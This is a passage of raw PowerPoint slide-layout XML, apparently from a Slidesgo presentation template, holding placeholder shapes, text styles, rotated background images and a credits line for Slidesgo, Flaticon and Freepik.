          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accen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18" name="Google Shape;218;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000875" y="3509446"/>
            <a:ext cx="24231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9" name="Google Shape;219;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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220" name="Google Shape;220;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="23147" r="0" t="15754"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5748539" y="489536"/>
            <a:ext cx="4351724" cy="2953549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="221" name="Google Shape;221;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="19672" r="0" t="17471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399996">
            <a:off x="-957325" y="1514479"/>
            <a:ext cx="4633974" cy="2947919"/>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9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="222" name="Shape 222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p22"/>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224" name="Google Shape;224;p22"/>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2"/>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2"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867750" y="3269200"/>
            <a:ext cx="1841400" cy="36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solidFill>
                  <a:schemeClr val="accen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28" name="Google Shape;228;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867750" y="3500976"/>
            <a:ext cx="18414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9" name="Google Shape;229;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651596" y="3269200"/>
            <a:ext cx="1841400" cy="36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solidFill>
                  <a:schemeClr val="accen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30" name="Google Shape;230;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651596" y="3500976"/>
            <a:ext cx="18414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1" name="Google Shape;231;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434843" y="3269200"/>
            <a:ext cx="1841400" cy="36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solidFill>
                  <a:schemeClr val="accen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32" name="Google Shape;232;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434843" y="3500976"/>
            <a:ext cx="18414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3" name="Google Shape;233;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316850" y="1989375"/>
            <a:ext cx="943200" cy="514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4800"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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234" name="Google Shape;234;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="7" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100400" y="1989375"/>
            <a:ext cx="943200" cy="514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4800"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883943" y="1989375"/>
            <a:ext cx="943200" cy="514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4800"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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237" name="Google Shape;237;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="23312" r="0" t="17389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5724725" y="522874"/>
            <a:ext cx="4342200" cy="2896400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Google Shape;238;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="21488" r="0" t="20407"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399996">
            <a:off x="-852549" y="1514479"/>
            <a:ext cx="4529198" cy="2843144"/>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7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="239" name="Shape 239"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="240" name="Google Shape;240;p23"/>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241" name="Google Shape;241;p23"/>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3"/>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3"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721575" y="540775"/>
            <a:ext cx="7704000" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">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pic>
        <p:nvPicPr>
          <p:cNvPr id="245" name="Google Shape;245;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="26204" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-785911" y="1937192"/>
            <a:ext cx="3611223" cy="3030000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Google Shape;246;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="26335" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400005">
            <a:off x="6372987" y="109689"/>
            <a:ext cx="3429100" cy="2866821"/>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8">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="247" name="Shape 247"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248;p24"/>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249" name="Google Shape;249;p24"/>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4"/>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4"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243613" y="573100"/>
            <a:ext cx="4661700" cy="1155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7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53" name="Google Shape;253;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243625" y="1723300"/>
            <a:ext cx="4661700" cy="1155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400"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072100" y="4182850"/>
            <a:ext cx="4999800" cy="420600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
              </a:rPr>
              <a:t>CREDITS: This presentation template was created by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Slidesgo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
              </a:rPr>
              <a:t>, and includes icons by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Flaticon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
              </a:rPr>
              <a:t> and infographics &amp; images by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Karla"/>
                <a:ea typeface="Karla"/>
                <a:cs typeface="Karla"/>
                <a:sym typeface="Karla"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Freepik</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Karla"/>
              <a:ea typeface="Karla"/>
              <a:cs typeface="Karla"/>
              <a:sym typeface="Karla"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Google Shape;255;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="18320" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5077976" y="347474"/>
            <a:ext cx="5076823" cy="3848475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;256;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="14258" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="-1076912" y="756716"/>
            <a:ext cx="5372099" cy="385867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8">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="257" name="Shape 257"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
